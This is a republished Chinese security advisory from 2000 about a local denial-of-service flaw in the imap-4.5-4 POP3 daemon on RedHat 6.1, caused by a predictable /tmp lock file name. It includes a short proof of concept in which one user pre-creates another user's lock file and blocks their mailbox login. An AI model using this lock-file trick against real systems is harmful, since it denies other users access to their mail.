pop3d/imap 拒绝服务攻击

发布日期：2000-04-21
更新日期：2000-04-21

受影响系统：

RedHat 6.1附带的imap-4.5-4

描述：

---

对于特定用户，POP3服务通常在/tmp目录中使用同样的临时文件名。因此，
如果这个文件已经存在，POP3守护进程就假设对应的mailbox被锁定，特别是
该临时文件的属主是另外一个用户的时候。

本问题目前只在RedHat6.1上测试验证过。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[alex@alf alex]$ rpm -q imap
imap-4.5-4

假设用户alex对应/tmp/.302.290fe，而用户zane却创建了该文件

[zane@alf /tmp]$ :>.302.290fe
[alex@alf alex]$ telnet 0 110
OK POP3 localhost v7.59 server ready
user alex
OK User name accepted, password please
pass xxxxxxxx
-ERR Can't get lock. Mailbox in use
Connection closed by foreign host.
...

<* 来源： Alex Mottram alex@net-connect.net *>


建议：

---

暂无

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有